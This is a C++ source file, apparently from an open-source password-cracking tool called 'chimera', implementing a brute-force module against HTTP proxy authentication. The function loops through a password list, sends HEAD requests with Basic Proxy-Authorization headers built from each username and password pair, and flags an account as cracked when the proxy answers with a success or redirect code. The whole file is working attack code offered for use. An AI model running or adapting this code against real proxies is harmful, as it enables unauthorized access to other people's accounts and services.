/***************************************************************************
 *  service-http-proxy.cc : This file is part of 'chimera'
 *
 *  (c) 2004 by Lukasz Tomicki <tomicki@o2.pl>
 *
 ****************************************************************************/

/*
 *  This program is free software; you can redistribute it and/or modify
 *  it under the terms of the GNU General Public License as published by
 *  the Free Software Foundation; either version 2 of the License, or
 *  (at your option) any later version.
 *
 *  This program is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *  GNU Library General Public License for more details.
 *
 *  You should have received a copy of the GNU General Public License
 *  along with this program; if not, write to the Free Software
 *  Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
 */																										

#include "CServiceAttack.h"

using namespace std;

int CServiceAttack::service_http_proxy(thread_data *pData)
{
	SOCKET sock = init_connection(pData);
	char buffer1[1024];
	char buffer3[100];
	bool passwd_used(1);
	while (pData->state == WORKING) {
		if (!sock) {
			sock = init_connection(pData);
			continue;
		}
		
		if (passwd_used) {
			if (!get_next_passwd(pData, buffer3, 100)) {
				pData->state = DONE;
				continue;
			}
			passwd_used = 0;
		}
		
		char buffer2[100];
		sprintf(buffer2, "%s:%s", pData->user, buffer3);
  		convert_to_base64((u8*) buffer2);
		
		char *ptr, *ptr2;
		if (pData->misc) {
			ptr = pData->misc + 4;
			ptr2 = pData->misc + 8 + *pData->misc;
		} else {
			ptr = "http://www.google.com/";
			ptr2 = "www.google.com";
		}
		
  		snprintf(buffer1, 1024, "HEAD %s HTTP/1.0\r\nHost: %s\r\nProxy-Authorization: Basic %s\r\nUser-Agent: Mozilla/4.0\r\n\r\n", 
			ptr, ptr2, buffer2);

		sendAll(sock, pData->ssl, buffer1, strlen(buffer1), 0, std_timeout);
		
		if (!recvAll(sock, pData->ssl, buffer1, 1024, 0, std_timeout)) {
			close(sock);
			adjust_connections(pData);
			return 0;
		}
		
		output(MSG_VERBOSE, "trying password %s\n", buffer3);
		
		ptr = strstr(buffer1, "HTTP/1.");
		ptr = index(buffer1, ' ') + 1;

		if (*ptr == '2' || (*ptr == '3' && *(ptr + 2) == '1')) 
			account_cracked(pData, buffer3);
		
		passwd_used = true;
		close(sock);
		sock = 0;
	}
	close(sock);
	return 0;
}
